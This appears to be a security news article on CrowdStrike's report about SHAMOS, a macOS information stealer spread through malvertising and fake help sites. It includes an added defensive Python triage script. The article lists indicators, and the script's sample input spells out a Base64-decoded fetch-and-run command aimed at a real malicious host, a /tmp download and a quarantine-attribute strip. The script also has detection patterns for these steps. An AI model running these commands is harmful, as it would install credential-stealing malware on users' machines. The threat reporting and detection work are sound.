Over 300 entities hit by the Atomic macOS Stealer via malvertising campaign between June and August, CrowdStrike warns.
Between June and August, over 300 entities were hit by SHAMOS, a variant of the Atomic macOS Stealer (AMOS), CrowdStrike reports.
The Atomic macOS Stealer lets operators steal diverse information from infected machines. This includes Keychain passwords, system details, desktop files, and macOS passwords.
The malware is able to steal data from multiple browsers, including auto-fills, passwords, cookies, wallets, and credit card information. AMOS can target multiple cryptowallets such as Electrum, Binance, Exodus, Atomic, and Coinomi.
Between June and Aug 2025, CrowdStrike blocked over 300 SHAMOS attacks by the cybercrime group COOKIE SPIDER. Sold as malware-as-a-service, SHAMOS was spread via malvertising, luring victims to fake macOS help sites and tricking them into running a malicious one-line install command.
“Operating as malware-as-a-service, COOKIE SPIDER rents this information stealer to cybercriminals who deploy it to harvest sensitive information and cryptocurrency assets from victims. The campaign utilized malvertising to direct users to fraudulent macOS help websites where victims were instructed to execute a malicious one-line installation command.” reads the report published by CrowdStrike. “This campaign underscores the popularity of malicious one-line installation commands among eCrime actors”
The one-line command installs a Mach-O executable while bypassing Gatekeeper checks. It highlights cybercrime’s growing reliance on such commands, also seen in prior Cuckoo Stealer and SHAMOS Homebrew campaigns.
In June 2025, a malvertising campaign lured users searching for macOS help (e.g., “flush resolver cache”) to fake sites. Victims were located in Canada, China, Colombia, Italy, Japan, Mexico, the US, the UK, and other countries, but none in Russia, likely because Russian operators of MaaS ban targeting Russia and CIS countries.
Threat actors spoofed an Australia-based store in Google Ads to promote fake macOS help sites (mac-safer[.]com, rescue-mac[.]com). Victims were tricked into executing a malicious one-line command in Terminal that decoded a Base64 string, stole passwords, and installed SHAMOS malware from icloudservers[.]com.
“The command decodes the Base64-encoded string aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo and downloads a file from https[:]//icloudservers[.]com/gm/install[.]sh.” reads the report published by CrowdStrike. “This file is a Bash script that captures the user’s password and downloads a SHAMOS Mach-O executable from https[:]//icloudservers[.]com/gm/update.”

Since June 2025, CrowdStrike has tracked continued use of such malvertising campaigns, often disguised as free macOS tools, using either plain text or Base64-encoded URLs.
SHAMOS installs itself in the /tmp/ directory, stripping extended file attributes to bypass Apple’s Gatekeeper protections before making itself executable. It runs checks to avoid sandboxes and then uses AppleScript to scan the system, searching for cryptocurrency wallets, Keychain data, Apple Notes, and browser credentials. Stolen files are packed into out.zip and sent out via curl. The malware also downloads extra payloads, including a fake Ledger Live app and a botnet module, hiding them in the user’s home directory. To stay persistent, it creates a com.finder.helper.plist file in LaunchDaemons if it has sudo access. Frequent curl activity shows its botnet module in action.
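As an added illustration of how a defender might hunt for the delivery and staging behaviour described above (example code added here, not CrowdStrike’s tooling), the Python below triages recorded shell commands for the observable patterns the article names: a Base64-encoded URL decoded and piped to a shell or downloader, the known distribution hosts (defanged in the article, restored here only so hostnames compare), and a quarantine-attribute strip on a file in /tmp. It also flags the com.finder.helper.plist LaunchDaemon artifact. The sample command lines and plist paths are constructed; the Base64 string and hostnames are the ones the article reports.

```python
"""Triage of recorded shell commands for the SHAMOS delivery/staging patterns.

Added example: not CrowdStrike's code. Hostnames are the article's indicators
with the defanging brackets removed so they can be compared.
"""
import base64
import binascii
import re
from urllib.parse import urlparse

KNOWN_BAD_HOSTS = {"icloudservers.com", "mac-safer.com", "rescue-mac.com"}
PERSISTENCE_PLIST = "com.finder.helper.plist"

# A Base64 run long enough to carry a URL, restricted to the strict alphabet.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# "base64 -d" / "base64 -D" / "base64 --decode" whose output feeds a shell or curl.
DECODE_TO_EXEC = re.compile(
    r"base64\s+(-d|-D|--decode)\b.*\|\s*(xargs\s+)?(sh|bash|zsh|curl)\b"
)
# Quarantine attribute stripped from a file under /tmp, as the article describes.
XATTR_STRIP = re.compile(r"xattr\s+(-c|-d\s+com\.apple\.quarantine)\s+\S*/tmp/")
PLAIN_URL = re.compile(r"https?://[^\s'\"|;&]+")


def decoded_urls(command: str) -> list[str]:
    """Return URLs hidden inside Base64 tokens of the command (strict decoding)."""
    urls = []
    for token in B64_TOKEN.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not real Base64, or not text: ignore
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls


def bad_hosts_in(command: str) -> set[str]:
    """Known distribution hosts present either in plaintext or Base64-encoded."""
    hosts = set()
    for url in PLAIN_URL.findall(command) + decoded_urls(command):
        host = (urlparse(url).hostname or "").lower()
        if host in KNOWN_BAD_HOSTS:
            hosts.add(host)
    return hosts


def triage_command(command: str) -> list[str]:
    """Return the reasons a command is suspicious, in a fixed order (empty if none)."""
    reasons = []
    hosts = bad_hosts_in(command)
    if hosts:
        reasons.append("known-host:" + ",".join(sorted(hosts)))
    if DECODE_TO_EXEC.search(command):
        reasons.append("base64-decode-to-exec")
    if XATTR_STRIP.search(command):
        reasons.append("quarantine-strip-in-tmp")
    return reasons


def triage_persistence(plist_paths: list[str]) -> list[str]:
    """Flag LaunchDaemon entries matching the persistence artifact from the article."""
    return [p for p in plist_paths if p.endswith("/" + PERSISTENCE_PLIST)]


# Constructed sample input: what a shell-history or EDR command collector might record.
# Line 0 mirrors the shape the article describes (Base64 URL decoded, then fetched and run).
SAMPLE_COMMANDS = [
    "echo aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo | base64 -d | xargs curl -fsSL | bash",
    "curl -fsSL https://icloudservers.com/gm/update -o /tmp/update",
    "xattr -c /tmp/update && chmod +x /tmp/update",
    "sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder",  # benign DNS flush
    "echo aGVsbG8gd29ybGQgZnJvbSBtYWNvcw== | base64 -d",              # benign Base64 use
    "brew install wget",
]
# Constructed LaunchDaemon listing; org.example.agent is a placeholder name.
SAMPLE_PLISTS = [
    "/Library/LaunchDaemons/org.example.agent.plist",
    "/Library/LaunchDaemons/com.finder.helper.plist",
]

if __name__ == "__main__":
    for i, cmd in enumerate(SAMPLE_COMMANDS):
        print(i, triage_command(cmd) or "clean", "|", cmd)
    print("persistence:", triage_persistence(SAMPLE_PLISTS))
```

Only the plaintext and decoded hostnames are matched against the indicator list; the other two rules are behavioural, so they will also surface legitimate admin activity and are better treated as hunting leads than as block decisions.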
“This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors.” concludes the report. “Promoting false malicious websites encourages more site traffic, which will lead to more potential victims. The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim’s machine while bypassing Gatekeeper checks.”
Pierluigi Paganini
(SecurityAffairs – hacking, Atomic macOS Stealer)